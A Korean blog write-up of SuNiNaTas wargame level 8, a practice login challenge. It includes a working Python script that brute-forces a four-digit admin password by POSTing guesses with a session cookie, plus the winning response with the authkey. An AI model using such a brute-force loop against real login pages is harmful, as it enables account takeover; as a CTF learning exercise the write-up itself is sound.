Write-up

[SuNiNaTas] level 8

ch4rli3kop 2019. 4. 13. 21:52

Suninatas level 8

keyword : brute force

<!-- Hint : Login 'admin' Password in 0~9999 -->
<!-- M@de by 2theT0P -->

brute force 문제인 것 같다.

id와 pw를 입력했을 때의 fiddler로 잡아본 결과 id와 pw는 body에 들어가고 POST 요청으로 나가는 것을 확인할 수 있었다.

적당히 다음과 같은 코드를 짜서 돌리면 된다.

import urllib.request

target = 'http://suninatas.com/Part_one/web08/web08.asp'
r = urllib.request.Request(target)
r.add_header("Cookie","ASPSESSIONIDCSAARTSC=KELNKLFBEBIHLHILKGKJNOBN")
for i in range(0, 9999):
    data = urllib.request.urlopen(r, ('id=admin&pw=' + str(i).zfill(4)).encode('utf-8')).read()
    print(str(i).zfill(4))
    if 'key' in str(data):
        break
print(data)

7707에서 터졌다!

7704
7705
7706
7707
b'\r\n\t\t<script>alert(\'Congratulation!\');</script>\r\n\t\r\n\r\n<html>\r\n\t<title>Game No.8</title>\r\n\t<head><link href="/include/style.css" rel="stylesheet" type="text/css"></head>\r\n\t<BODY>\r\n\t\t<form method="Post" action="./web08.asp">\r\n\t\t<br>\r\n\t\t\t\t<br>\r\n\t\t\t\t\t\t<br>\r\n\t\t\t\t\t\t\t\t<br>\r\n\t\t\t\t\t\t<br>\t\t\t\t\t\t\r\n\t\t\t\t<br>\r\n\t\t<br>\r\n\t\t<table width="240" cellpadding="0" cellspacing="0" align="center">\r\n\t\t\t\t<tr height="30">\r\n\t\t\t\t\t<td width="50%" class="table_top" align="center"><input type="button" name="main_btn" value="main" style="width:60" onclick="location.href=\'/main/main.asp\'"></td>\r\n\t\t\t\t\t<td width="50%" class="table_top" align="center"><input type="button" name="main_btn" value="Back" style="width:60" onclick="history.back()"></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30" class="table_main" >\r\n\t\t\t\t\t<td width="120" align="center" bgcolor="cccccc"><font size="2"><b>ID</b></font></td>\r\n\t\t\t\t\t<td width="120" align="center" bgcolor="cccccc"><input type="text" name="id" style="width:90" ></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30" class="table_main" >\r\n\t\t\t\t\t<td align="center" bgcolor="cccccc"><font size="2" ><b>PW</b></font></td>\r\n\t\t\t\t\t<td align="center" bgcolor="cccccc"><input type="password" name="pw" style="width:90" maxlength="4" ></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30">\r\n\t\t\t\t\t<td colspan="2" align="center" class="table_top" bgcolor="cccccc"><input type="button" name="btn" value="Login" onclick="submit()" size=20></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr class="table_main" height="30">\r\n\t\t\t\t\t<td colspan="2" align="center" bgcolor="cccccc">Authkey : l3ruteforce P@ssword</td>\r\n\t\t\t\t</tr>\r\n\t\t\t</table>\r\n\t\t</form>\r\n\t</BODY>\r\n</html>\r\n\r\n\r\n<!-- Hint : Login \'admin\' Password in 0~9999 -->\r\n<!-- M@de by 2theT0P -->'

저작자표시 비영리 변경금지

'Write-up' 카테고리의 다른 글

[SuNiNaTas] level 23 (0)	2019.04.13
[SuNiNaTas] level 22 (0)	2019.04.13
[SuNiNaTas] level 7 (0)	2019.04.13
[SuNiNaTas] level 6 (1)	2019.04.13
[SuNiNaTas] level 5 (0)	2019.04.13

현재글[SuNiNaTas] level 8

만두 포스팅용 블로그입니다

PE parser, overthewire, suninatas, PE 구조, SECURITYFEST 2018, harekaze, what the fuzz, inctf 2018, harekaze ctf 2018, CSAW 2017, DCTF 2017, python, writeup, WEB, Unity, pwnable.kr, codegate 2018, pyqt4, Frida, write up,

Today :
Yesterday :

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

만두만두

[SuNiNaTas] level 8

Suninatas level 8

'Write-up' 카테고리의 다른 글

'Write-up'의 다른글

티스토리툴바

[SuNiNaTas] level 8

Suninatas level 8

'Write-up' 카테고리의 다른 글

'Write-up'의 다른글

관련글

티스토리툴바